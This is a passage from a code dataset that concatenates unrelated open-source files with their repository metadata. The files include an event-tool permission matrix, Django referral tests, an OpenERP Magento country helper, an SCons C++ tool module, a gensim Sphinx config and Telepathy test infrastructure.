],
ACCESS_EVENT_EDIT_DUPLICATES: [
EventAdminRoles.ROLE_ADMIN,
EventAdminRoles.ROLE_RESTRICTED_ADMIN,
],
ACCESS_EVENT_VIEW_COORDINATORS: [
EventAdminRoles.ROLE_ADMIN,
EventAdminRoles.ROLE_RESTRICTED_ADMIN,
EventAdminRoles.ROLE_FRONTDESK,
EventAdminRoles.ROLE_INVENTORY,
],
ACCESS_EVENT_VIEW_AUDITLOGS: [
EventAdminRoles.ROLE_ADMIN,
],
ACCESS_JOB_EDIT: [
EventAdminRoles.ROLE_ADMIN,
],
ACCESS_JOB_EDIT_HELPERS: [
EventAdminRoles.ROLE_ADMIN,
EventAdminRoles.ROLE_RESTRICTED_ADMIN,
],
ACCESS_JOB_VIEW_HELPERS: [
EventAdminRoles.ROLE_ADMIN,
EventAdminRoles.ROLE_RESTRICTED_ADMIN,
EventAdminRoles.ROLE_FRONTDESK,
EventAdminRoles.ROLE_INVENTORY,
],
ACCESS_JOB_SEND_MAILS: [
EventAdminRoles.ROLE_ADMIN,
EventAdminRoles.ROLE_RESTRICTED_ADMIN,
],
ACCESS_JOB_VIEW_MAILS: [
EventAdminRoles.ROLE_ADMIN,
EventAdminRoles.ROLE_RESTRICTED_ADMIN,
],
ACCESS_JOB_VIEW_STATISTICS: [
EventAdminRoles.ROLE_ADMIN,
EventAdminRoles.ROLE_RESTRICTED_ADMIN,
],
ACCESS_HELPER_EDIT: [
EventAdminRoles.ROLE_ADMIN,
EventAdminRoles.ROLE_RESTRICTED_ADMIN,
],
ACCESS_HELPER_VIEW: [
EventAdminRoles.ROLE_ADMIN,
EventAdminRoles.ROLE_RESTRICTED_ADMIN,
EventAdminRoles.ROLE_FRONTDESK,
EventAdminRoles.ROLE_INVENTORY,
],
ACCESS_HELPER_INTERNAL_COMMENT_EDIT: [
EventAdminRoles.ROLE_ADMIN,
EventAdminRoles.ROLE_RESTRICTED_ADMIN,
EventAdminRoles.ROLE_FRONTDESK,
],
ACCESS_HELPER_INTERNAL_COMMENT_VIEW: [
EventAdminRoles.ROLE_ADMIN,
EventAdminRoles.ROLE_RESTRICTED_ADMIN,
EventAdminRoles.ROLE_FRONTDESK,
EventAdminRoles.ROLE_INVENTORY,
],
ACCESS_HELPER_RESEND: [
EventAdminRoles.ROLE_ADMIN,
EventAdminRoles.ROLE_RESTRICTED_ADMIN,
EventAdminRoles.ROLE_FRONTDESK,
],
ACCESS_INVENTORY_EDIT: [
EventAdminRoles.ROLE_ADMIN,
],
ACCESS_INVENTORY_HANDLE: [
EventAdminRoles.ROLE_ADMIN,
EventAdminRoles.ROLE_RESTRICTED_ADMIN,
EventAdminRoles.ROLE_INVENTORY,
],
ACCESS_BADGES_EDIT: [
EventAdminRoles.ROLE_ADMIN,
],
ACCESS_BADGES_EDIT_HELPER: [
EventAdminRoles.ROLE_ADMIN,
EventAdminRoles.ROLE_RESTRICTED_ADMIN,
],
ACCESS_BADGES_EDIT_SPECIAL: [
EventAdminRoles.ROLE_ADMIN,
EventAdminRoles.ROLE_RESTRICTED_ADMIN,
],
ACCESS_BADGES_GENERATE: [
EventAdminRoles.ROLE_ADMIN,
EventAdminRoles.ROLE_RESTRICTED_ADMIN,
EventAdminRoles.ROLE_BADGES,
],
ACCESS_MAILS_SEND: [
EventAdminRoles.ROLE_ADMIN,
EventAdminRoles.ROLE_RESTRICTED_ADMIN,
],
ACCESS_MAILS_VIEW: [
EventAdminRoles.ROLE_ADMIN,
EventAdminRoles.ROLE_RESTRICTED_ADMIN,
],
ACCESS_STATISTICS_VIEW: [
EventAdminRoles.ROLE_ADMIN,
EventAdminRoles.ROLE_RESTRICTED_ADMIN,
],
ACCESS_GIFTS_EDIT: [
EventAdminRoles.ROLE_ADMIN,
],
ACCESS_GIFTS_HANDLE_GIFTS: [
EventAdminRoles.ROLE_ADMIN,
EventAdminRoles.ROLE_RESTRICTED_ADMIN,
EventAdminRoles.ROLE_FRONTDESK,
],
ACCESS_GIFTS_HANDLE_PRESENCE: [
EventAdminRoles.ROLE_ADMIN,
EventAdminRoles.ROLE_RESTRICTED_ADMIN,
],
ACCESS_GIFTS_VIEW_SUMMARY: [
EventAdminRoles.ROLE_ADMIN,
EventAdminRoles.ROLE_RESTRICTED_ADMIN,
],
ACCESS_PREREQUISITES_EDIT: [
EventAdminRoles.ROLE_ADMIN,
],
ACCESS_PREREQUISITES_VIEW: [
EventAdminRoles.ROLE_ADMIN,
EventAdminRoles.ROLE_RESTRICTED_ADMIN,
],
ACCESS_PREREQUISITES_HANDLE: [
EventAdminRoles.ROLE_ADMIN,
EventAdminRoles.ROLE_RESTRICTED_ADMIN,
],
ACCESS_CORONA_EDIT: [
EventAdminRoles.ROLE_ADMIN,
],
ACCESS_CORONA_VIEW: [
EventAdminRoles.ROLE_ADMIN,
],
}
def has_access(user, resource, access):
"""
Checks whether the user has access to the resource with the requested access type.
"""
# No user, no permissions
if not user.is_authenticated:
return False
# superuser can do anything
if user.is_superuser:
return True
# check type of accessed resource
if isinstance(resource, Event):
return _has_access_event(user, resource, access)
elif isinstance(resource, Job):
return _has_access_job(user, resource, access)
elif isinstance(resource, Helper):
return _has_access_helper(user, resource, access)
else:
raise ValueError("Invalid resource type")
def has_access_event_or_job(user, event, access_event, access_job):
"""
Checks whether the user has access to the event with the specified `access_event`
or to any job of the event with `access_job`.
`access_event` can be `None`.
"""
# check event
if access_event and has_access(user, event, access_event):
return True
# check jobs
for job in event.job_set.all():
if has_access(user, job, access_job):
return True
return False
def _has_access_event(user, event, access):
# check role
if _check_event_role(user, event, access):
return True
# special cases
if access == ACCESS_INVOLVED:
# involved: also check jobs
for job in event.job_set.all():
if _check_job_role(user, job, access):
return True
# nothing worked, no access
return False
def _has_access_job(user, job, access):
# check role
if _check_event_role(user, job.event, access):
return True
# handle job admins
if _check_job_role(user, job, access):
return True
return False
def _has_access_helper(user, helper, access):
# check role
if _check_event_role(user, helper.event, access):
return True
# handle job admins for helpers
for shift in helper.shifts.all():
if _check_job_role(user, shift.job, access):
return True
# handle job admins for coordinators
for job in helper.job_set.all():
if _check_job_role(user, job, access):
return True
return False
def _check_event_role(user, event, access):
"""
Check whether the user has a required role for this access
"""
# get admin roles of user
try:
admin_roles = EventAdminRoles.objects.get(event=event, user=user).roles
except EventAdminRoles.DoesNotExist:
return False
# get required roles for this access type
try:
required_roles = _rbac_matrix[access]
except KeyError:
raise ValueError("Invalid access type")
# check if we have one of the required roles. then we are done
for role in admin_roles:
if role in required_roles:
return True
return False
def _check_job_role(user, job, access):
# user is job admin or not, nothing more
return job.job_admins.filter(pk=user.pk).exists()
|
helfertool/helfertool
|
src/registration/permissions.py
|
Python
|
agpl-3.0
| 11,569
|
"""
Tests for smart_referral helpers
"""
from ddt import ddt, file_data
from django.test import TestCase
from lms.djangoapps.onboarding.tests.factories import OrganizationFactory, UserFactory
from openedx.features.smart_referral import helpers as filter_contacts_helpers
from openedx.features.smart_referral.tests.factories import SmartReferralFactory
from .constants import (
FILTER_CONTACTS_LIST_INDEX,
SORTED_CONTACT_LIST_INDEX,
SORTED_CONTACT_LIST_KEY,
SORTED_NON_PLATFORM_CONTACT_LIST_INDEX,
SORTED_NON_PLATFORM_CONTACT_LIST_KEY,
SORTED_PLATFORM_CONTACT_LIST_INDEX,
SORTED_PLATFORM_CONTACT_LIST_KEY,
UNSORTED_CONTACT_LIST_INDEX,
UNSORTED_CONTACT_LIST_KEY
)
@ddt
class FilterContactsAPIViewTestHelpers(TestCase):
"""
Class contains tests for smart_referral helpers
"""
def test_get_email_domain(self):
"""
Test email domain, extracted from email address provided to 'get_email_domain' helper method.
:return: None
"""
test_email = 'testing.101@test.com'
expected_output = 'test.com'
actual_output = filter_contacts_helpers.get_email_domain(test_email)
self.assertEqual(expected_output, actual_output)
@file_data('data/test_data_contacts.json')
def test_sort_contacts_by_org_and_user_domain(self, contacts_data):
"""
Test sorting of contacts by two criteria first one is organization's admin email domain and
second one is user's email domain name.
:param contacts_data: Json data that is read from json file provided in test annotation.
:return: None
"""
org_admin_email = 'admin@test.com'
admin_user = UserFactory(email=org_admin_email)
org = OrganizationFactory(admin=admin_user)
user = UserFactory(email='testing.101@edx.com')
user.extended_profile.organization = org
user.extended_profile.save() # pylint: disable=no-member
contact_list = contacts_data[UNSORTED_CONTACT_LIST_INDEX][UNSORTED_CONTACT_LIST_KEY]
expected_output = contacts_data[SORTED_CONTACT_LIST_INDEX][SORTED_CONTACT_LIST_KEY]
actual_output = filter_contacts_helpers.sort_contacts_by_org_and_user_domain(contact_list, user=user)
self.assertEqual(expected_output, actual_output)
@file_data('data/test_data_contacts.json')
def test_get_platform_contacts_and_non_platform_contacts(self, contacts_data):
"""
Test to get two separated list contacts, one of those contacts who are
registered on our platform, second one are not.
:param contacts_data: Json data that is read from json file provided in test annotation.
:return: None
"""
UserFactory(email='testing.101@test.com')
UserFactory(email='testing.201@edx.com')
contact_list = contacts_data[SORTED_CONTACT_LIST_INDEX][SORTED_CONTACT_LIST_KEY]
expected_output_platform_contacts = \
contacts_data[SORTED_PLATFORM_CONTACT_LIST_INDEX][SORTED_PLATFORM_CONTACT_LIST_KEY]
expected_output_non_platform_contacts = \
contacts_data[SORTED_NON_PLATFORM_CONTACT_LIST_INDEX][SORTED_NON_PLATFORM_CONTACT_LIST_KEY]
actual_output_platform_contacts, actual_output_non_platform_contacts = \
filter_contacts_helpers.get_platform_contacts_and_non_platform_contacts(contact_list)
self.assertEqual(expected_output_platform_contacts, actual_output_platform_contacts)
self.assertEqual(expected_output_non_platform_contacts, actual_output_non_platform_contacts)
def test_get_org_admin_email_org_with_admin(self):
"""
Test to get admin's email of an organization from which user is affiliated
:return: None
"""
org_admin_email = 'admin@organization101.com'
admin_user = UserFactory(email=org_admin_email)
org = OrganizationFactory(admin=admin_user)
user = UserFactory(email='testing.101@test.com')
user.extended_profile.organization = org
user.extended_profile.save() # pylint: disable=no-member
actual_result = filter_contacts_helpers.get_org_admin_email(user)
self.assertEqual(org_admin_email, actual_result)
def test_get_org_admin_email_org_without_admin(self):
"""
Test to get admin's email of an organization from which user is affiliated.
In this case organization don't have an admin hence resultant email address should be 'None'.
:return: None
"""
org = OrganizationFactory()
user = UserFactory(email='testing.101@test.com')
user.extended_profile.organization = org
user.extended_profile.save() # pylint: disable=no-member
actual_result = filter_contacts_helpers.get_org_admin_email(user)
self.assertIsNone(actual_result)
def test_get_org_admin_email_unaffiliated_user(self):
"""
Test to get admin's email of an organization from which user isn't affiliated, since
our user isn't affiliated so resultant email address should be 'None'.
:return: None
"""
user = UserFactory(email='testing.101@test.com')
actual_result = filter_contacts_helpers.get_org_admin_email(user)
self.assertIsNone(actual_result)
@file_data('data/test_data_filter_referred_contacts.json')
def test_filter_referred_contacts_already_referred_by_current_user(self, contacts):
"""
Test filtering contacts which are already referred by current user.
"""
current_user = UserFactory(email='current_user@test.com')
any_other_user = UserFactory(email='any_other_user@test.com')
# refer two different contacts by current user, it should be filtered
SmartReferralFactory(user=current_user, contact_email='testing1@test.com')
SmartReferralFactory(user=current_user, contact_email='testing3@test.com')
# refer a contact once by any other user, it should not be filtered
SmartReferralFactory(user=any_other_user, contact_email='testing1@test.com')
contact_list = contacts[FILTER_CONTACTS_LIST_INDEX]
filtered_contacts = filter_contacts_helpers.filter_referred_contacts(contact_list['all_contacts'], current_user)
self.assertEqual(filtered_contacts, contact_list['filter_contacts_referred_by_current_user'])
@file_data('data/test_data_filter_referred_contacts.json')
def test_filter_referred_contacts_already_referred_twice(self, contacts):
"""
Test filtering contacts which are already referred by other users twice.
"""
current_user = UserFactory(email='current_user@test.com')
any_other_user1 = UserFactory(email='any_other_user1@test.com')
any_other_user2 = UserFactory(email='any_other_user2@test.com')
# refer single contact by two users, it should be filtered
SmartReferralFactory(user=any_other_user1, contact_email='testing4@test.com')
SmartReferralFactory(user=any_other_user2, contact_email='testing4@test.com')
# refer a contact only once by other user, it should not be filtered
SmartReferralFactory(user=any_other_user2, contact_email='testing1@test.com')
contact_list = contacts[FILTER_CONTACTS_LIST_INDEX]
filtered_contacts = filter_contacts_helpers.filter_referred_contacts(contact_list['all_contacts'], current_user)
self.assertEqual(filtered_contacts, contact_list['filter_contacts_referred_twice'])
|
philanthropy-u/edx-platform
|
openedx/features/smart_referral/tests/test_helpers.py
|
Python
|
agpl-3.0
| 7,514
|
# -*- coding: utf-8 -*-
# © 2016 LasLabs Inc.
# License GPL-3.0 or later (http://www.gnu.org/licenses/lgpl.html).
from . import test_medical_pharmacy
|
laslabs/vertical-medical
|
medical_pharmacy/tests/__init__.py
|
Python
|
agpl-3.0
| 152
|
# -*- coding: utf-8 -*-
"""
country
Country
:copyright: (c) 2013 by Openlabs Technologies & Consulting (P) Limited
:license: AGPLv3, see LICENSE for more details.
"""
from openerp.osv import osv
from openerp.tools.translate import _
import pycountry
class Country(osv.osv):
"Country"
_inherit = 'res.country'
def search_using_magento_code(self, cursor, user, code, context):
"""
Searches for country with given magento code.
:param cursor: Database cursor
:param user: ID of current user
:param code: ISO code of country
:param context: Application context
:return: Browse record of country if found else raises error
"""
country_ids = self.search(
cursor, user, [('code', '=', code)], context=context
)
if not country_ids:
raise osv.except_osv(
_('Not Found!'),
_('Country with ISO code %s does not exists.' % code)
)
country = self.browse(
cursor, user, country_ids[0], context=context
)
return country
class CountryState(osv.Model):
"Country State"
_inherit = 'res.country.state'
def find_or_create_using_magento_region(
self, cursor, user, country, region, context
):
"""
Looks for the state whose `region` is sent by magento in `country`
If state already exists, return that else create a new one and
return
:param cursor: Database cursor
:param user: ID of current user
:param country: Browse record of country
:param region: Name of state from magento
:param context: Application context
:return: Browse record of record created/found
"""
state = self.find_using_magento_region(
cursor, user, country, region, context
)
if not state:
state = self.create_using_magento_region(
cursor, user, country, region, context
)
return state
def find_using_magento_region(
self, cursor, user, country, region, context
):
"""
Looks for the state whose `region` is sent by magento
If state already exists, return that
:param cursor: Database cursor
:param user: ID of current user
:param country: Browse record of country
:param region: Name of state from magento
:param context: Application context
:return: Browse record of record found
"""
state_ids = self.search(
cursor, user, [
('name', 'ilike', region),
('country_id', '=', country.id),
], context=context
)
return state_ids and self.browse(
cursor, user, state_ids[0], context=context
) or None
def create_using_magento_region(
self, cursor, user, country, region, context
):
"""
Creates state for the region sent by magento
:param cursor: Database cursor
:param user: ID of current user
:param country: Browse record of country
:param region: Name of state from magento
:param context: Application context
:return: Browse record of record created
"""
code = None
try:
for subdivision in pycountry.subdivisions.get(
country_code=country.code):
if subdivision.name.upper() == region.upper():
code = ''.join(list(region)[:3]).upper()
break
if not code:
if country.code == 'US':
code = 'APO'
else:
code = ''.join(list(region)[:3]).upper()
except KeyError:
raise osv.except_osv(
_('Country Not Found!'),
_('No country found with code %s' % country.code)
)
finally:
state_id = self.create(
cursor, user, {
'name': region,
'country_id': country.id,
'code': code,
}, context=context
)
return self.browse(cursor, user, state_id, context=context)
|
jmesteve/openerpseda
|
openerp/addons_extra/magento_integration/country.py
|
Python
|
agpl-3.0
| 4,292
|
"""SCons.Tool.c++
Tool-specific initialization for generic Posix C++ compilers.
There normally shouldn't be any need to import this module directly.
It will usually be imported through the generic SCons.Tool.Tool()
selection method.
"""
#
# Copyright (c) 2001 - 2015 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "src/engine/SCons/Tool/c++.py rel_2.4.0:3365:9259ea1c13d7 2015/09/21 14:03:43 bdbaddog"
import os.path
import SCons.Tool
import SCons.Defaults
import SCons.Util
compilers = ['CC', 'c++']
CXXSuffixes = ['.cpp', '.cc', '.cxx', '.c++', '.C++', '.mm']
if SCons.Util.case_sensitive_suffixes('.c', '.C'):
CXXSuffixes.append('.C')
def iscplusplus(source):
if not source:
# Source might be None for unusual cases like SConf.
return 0
for s in source:
if s.sources:
ext = os.path.splitext(str(s.sources[0]))[1]
if ext in CXXSuffixes:
return 1
return 0
def generate(env):
"""
Add Builders and construction variables for Visual Age C++ compilers
to an Environment.
"""
import SCons.Tool
import SCons.Tool.cc
static_obj, shared_obj = SCons.Tool.createObjBuilders(env)
for suffix in CXXSuffixes:
static_obj.add_action(suffix, SCons.Defaults.CXXAction)
shared_obj.add_action(suffix, SCons.Defaults.ShCXXAction)
static_obj.add_emitter(suffix, SCons.Defaults.StaticObjectEmitter)
shared_obj.add_emitter(suffix, SCons.Defaults.SharedObjectEmitter)
SCons.Tool.cc.add_common_cc_variables(env)
if 'CXX' not in env:
env['CXX'] = env.Detect(compilers) or compilers[0]
env['CXXFLAGS'] = SCons.Util.CLVar('')
env['CXXCOM'] = '$CXX -o $TARGET -c $CXXFLAGS $CCFLAGS $_CCCOMCOM $SOURCES'
env['SHCXX'] = '$CXX'
env['SHCXXFLAGS'] = SCons.Util.CLVar('$CXXFLAGS')
env['SHCXXCOM'] = '$SHCXX -o $TARGET -c $SHCXXFLAGS $SHCCFLAGS $_CCCOMCOM $SOURCES'
env['CPPDEFPREFIX'] = '-D'
env['CPPDEFSUFFIX'] = ''
env['INCPREFIX'] = '-I'
env['INCSUFFIX'] = ''
env['SHOBJSUFFIX'] = '.os'
env['OBJSUFFIX'] = '.o'
env['STATIC_AND_SHARED_OBJECTS_ARE_THE_SAME'] = 0
env['CXXFILESUFFIX'] = '.cc'
def exists(env):
return env.Detect(env.get('CXX', compilers))
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
|
Uli1/mapnik
|
scons/scons-local-2.4.0/SCons/Tool/c++.py
|
Python
|
lgpl-2.1
| 3,432
|
from os import name as __name
from sys import modules as __modules
from warnings import warn
if __name == 'java':
warn("%s is not yet supported on jython"%__modules[__name__])
else:
from reporter_metabolites import *
del __name, __modules
|
jerkos/cobrapy
|
cobra/topology/__init__.py
|
Python
|
lgpl-2.1
| 248
|
# -*- coding: utf-8 -*-
#
# gensim documentation build configuration file, created by
# sphinx-quickstart on Wed Mar 17 13:42:21 2010.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import os
import sys
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.append(os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
html_theme = 'gensim_theme'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinxcontrib.napoleon']
autoclass_content = "both"
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
# source_encoding = 'utf-8'
# The master toctree document.
master_doc = 'indextoc'
# Additional templates that should be rendered to pages, maps page names to
# template names.
html_additional_pages = {'index': './_templates/indexcontent.html'}
# General information about the project.
project = u'gensim'
copyright = u'2009-now, Radim Řehůřek <me(at)radimrehurek.com>'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '2.3'
# The full version, including alpha/beta/rc tags.
release = '2.3.0'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
# language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
# today = ''
# Else, today_fmt is used as the format for a strftime call.
# today_fmt = '%B %d, %Y'
# List of documents that shouldn't be included in the build.
# unused_docs = []
# List of directories, relative to source directory, that shouldn't be searched
# for source files.
exclude_trees = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
# default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
# add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
# add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
# show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
# modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. Major themes that come with
# Sphinx are currently 'default' and 'sphinxdoc'.
# html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
# main_colour = "#ffbbbb"
html_theme_options = {
# "rightsidebar": "false",
# "stickysidebar": "true",
# "bodyfont": "'Lucida Grande', 'Lucida Sans Unicode', 'Geneva', 'Verdana', 'sans-serif'",
# "headfont": "'Lucida Grande', 'Lucida Sans Unicode', 'Geneva', 'Verdana', 'sans-serif'",
# "sidebarbgcolor": "fuckyou",
# "footerbgcolor": "#771111",
# "relbarbgcolor": "#993333",
# "sidebartextcolor": "#000000",
# "sidebarlinkcolor": "#330000",
# "codebgcolor": "#fffff0",
# "headtextcolor": "#000080",
# "headbgcolor": "#f0f0ff",
# "bgcolor": "#ffffff",
}
# Add any paths that contain custom themes here, relative to this directory.
html_theme_path = ['.']
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
html_title = "gensim"
# A shorter title for the navigation bar. Default is the same as html_title.
# html_short_title = ''
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
# html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
html_favicon = '_static/favicon.ico'
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
# html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
html_sidebars = {} # {'index': ['download.html', 'globaltoc.html', 'searchbox.html', 'indexsidebar.html']}
# html_sidebars = {'index': ['globaltoc.html', 'searchbox.html']}
# If false, no module index is generated.
# html_use_modindex = True
# If false, no index is generated.
# html_use_index = True
# If true, the index is split into individual pages for each letter.
html_split_index = False
# If true, links to the reST sources are added to the pages.
html_show_sourcelink = False
html_domain_indices = False
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
# html_use_opensearch = ''
# If nonempty, this is the file name suffix for HTML files (e.g. ".xhtml").
# html_file_suffix = ''
# Output file base name for HTML help builder.
htmlhelp_basename = 'gensimdoc'
html_show_sphinx = False
# -- Options for LaTeX output --------------------------------------------------
# The paper size ('letter' or 'a4').
# latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
# latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [('index', 'gensim.tex', u'gensim Documentation', u'Radim Řehůřek', 'manual')]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
# latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
latex_use_parts = False
# Additional stuff for the LaTeX preamble.
# latex_preamble = ''
# Documents to append as an appendix to all manuals.
# latex_appendices = []
# If false, no module index is generated.
# latex_use_modindex = True
suppress_warnings = ['image.nonlocal_uri', 'ref.citation', 'ref.footnote']
|
macks22/gensim
|
docs/src/conf.py
|
Python
|
lgpl-2.1
| 7,323
|
# This file is part of the GOsa framework.
#
# http://gosa-project.org
#
# Copyright:
# (C) 2016 GONICUS GmbH, Germany, http://www.gonicus.de
#
# See the LICENSE file in the project's top-level directory for details.
from lxml.builder import ElementMaker
def EventMaker():
"""
Returns the event skeleton object which can be directly used for
extending with event data.
"""
return ElementMaker(namespace="http://www.gonicus.de/Events", nsmap={None: "http://www.gonicus.de/Events"})
|
gonicus/gosa
|
common/src/gosa/common/event.py
|
Python
|
lgpl-2.1
| 506
|
"""
Infrastructure code for testing connection managers.
"""
from twisted.internet import glib2reactor
from twisted.internet.protocol import Protocol, Factory, ClientFactory
glib2reactor.install()
import sys
import pprint
import unittest
import dbus.glib
from twisted.internet import reactor
import constants as cs
tp_name_prefix = 'org.freedesktop.Telepathy'
tp_path_prefix = '/org/freedesktop/Telepathy'
class Event:
def __init__(self, type, **kw):
self.__dict__.update(kw)
self.type = type
def format_event(event):
ret = ['- type %s' % event.type]
for key in dir(event):
if key != 'type' and not key.startswith('_'):
ret.append('- %s: %s' % (
key, pprint.pformat(getattr(event, key))))
if key == 'error':
ret.append('%s' % getattr(event, key))
return ret
class EventPattern:
def __init__(self, type, **properties):
self.type = type
self.predicate = lambda x: True
if 'predicate' in properties:
self.predicate = properties['predicate']
del properties['predicate']
self.properties = properties
def __repr__(self):
properties = dict(self.properties)
if self.predicate:
properties['predicate'] = self.predicate
return '%s(%r, **%r)' % (
self.__class__.__name__, self.type, properties)
def match(self, event):
if event.type != self.type:
return False
for key, value in self.properties.iteritems():
try:
if getattr(event, key) != value:
return False
except AttributeError:
return False
if self.predicate(event):
return True
return False
class TimeoutError(Exception):
pass
class BaseEventQueue:
"""Abstract event queue base class.
Implement the wait() method to have something that works.
"""
def __init__(self, timeout=None):
self.verbose = False
self.forbidden_events = set()
if timeout is None:
self.timeout = 5
else:
self.timeout = timeout
def log(self, s):
if self.verbose:
print s
def log_event(self, event):
if self.verbose:
self.log('got event:')
if self.verbose:
map(self.log, format_event(event))
def forbid_events(self, patterns):
"""
Add patterns (an iterable of EventPattern) to the set of forbidden
events. If a forbidden event occurs during an expect or expect_many,
the test will fail.
"""
self.forbidden_events.update(set(patterns))
def unforbid_events(self, patterns):
"""
Remove 'patterns' (an iterable of EventPattern) from the set of
forbidden events. These must be the same EventPattern pointers that
were passed to forbid_events.
"""
self.forbidden_events.difference_update(set(patterns))
def _check_forbidden(self, event):
for e in self.forbidden_events:
if e.match(event):
print "forbidden event occurred:"
for x in format_event(event):
print x
assert False
def expect(self, type, **kw):
pattern = EventPattern(type, **kw)
while True:
event = self.wait()
self.log_event(event)
self._check_forbidden(event)
if pattern.match(event):
self.log('handled')
self.log('')
return event
self.log('not handled')
self.log('')
def expect_many(self, *patterns):
ret = [None] * len(patterns)
while None in ret:
try:
event = self.wait()
except TimeoutError:
self.log('timeout')
self.log('still expecting:')
for i, pattern in enumerate(patterns):
if ret[i] is None:
self.log(' - %r' % pattern)
raise
self.log_event(event)
self._check_forbidden(event)
for i, pattern in enumerate(patterns):
if ret[i] is None and pattern.match(event):
self.log('handled')
self.log('')
ret[i] = event
break
else:
self.log('not handled')
self.log('')
return ret
def demand(self, type, **kw):
pattern = EventPattern(type, **kw)
event = self.wait()
self.log_event(event)
if pattern.match(event):
self.log('handled')
self.log('')
return event
self.log('not handled')
raise RuntimeError('expected %r, got %r' % (pattern, event))
class IteratingEventQueue(BaseEventQueue):
"""Event queue that works by iterating the Twisted reactor."""
def __init__(self, timeout=None):
BaseEventQueue.__init__(self, timeout)
self.events = []
def wait(self):
stop = [False]
def later():
stop[0] = True
delayed_call = reactor.callLater(self.timeout, later)
while (not self.events) and (not stop[0]):
reactor.iterate(0.1)
if self.events:
delayed_call.cancel()
return self.events.pop(0)
else:
raise TimeoutError
def append(self, event):
self.events.append(event)
# compatibility
handle_event = append
class TestEventQueue(BaseEventQueue):
def __init__(self, events):
BaseEventQueue.__init__(self)
self.events = events
def wait(self):
if self.events:
return self.events.pop(0)
else:
raise TimeoutError
class EventQueueTest(unittest.TestCase):
def test_expect(self):
queue = TestEventQueue([Event('foo'), Event('bar')])
assert queue.expect('foo').type == 'foo'
assert queue.expect('bar').type == 'bar'
def test_expect_many(self):
queue = TestEventQueue([Event('foo'), Event('bar')])
bar, foo = queue.expect_many(
EventPattern('bar'),
EventPattern('foo'))
assert bar.type == 'bar'
assert foo.type == 'foo'
def test_expect_many2(self):
# Test that events are only matched against patterns that haven't yet
# been matched. This tests a regression.
queue = TestEventQueue([Event('foo', x=1), Event('foo', x=2)])
foo1, foo2 = queue.expect_many(
EventPattern('foo'),
EventPattern('foo'))
assert foo1.type == 'foo' and foo1.x == 1
assert foo2.type == 'foo' and foo2.x == 2
def test_timeout(self):
queue = TestEventQueue([])
self.assertRaises(TimeoutError, queue.expect, 'foo')
def test_demand(self):
queue = TestEventQueue([Event('foo'), Event('bar')])
foo = queue.demand('foo')
assert foo.type == 'foo'
def test_demand_fail(self):
queue = TestEventQueue([Event('foo'), Event('bar')])
self.assertRaises(RuntimeError, queue.demand, 'bar')
def unwrap(x):
"""Hack to unwrap D-Bus values, so that they're easier to read when
printed."""
if isinstance(x, list):
return map(unwrap, x)
if isinstance(x, tuple):
return tuple(map(unwrap, x))
if isinstance(x, dict):
return dict([(unwrap(k), unwrap(v)) for k, v in x.iteritems()])
if isinstance(x, dbus.Boolean):
return bool(x)
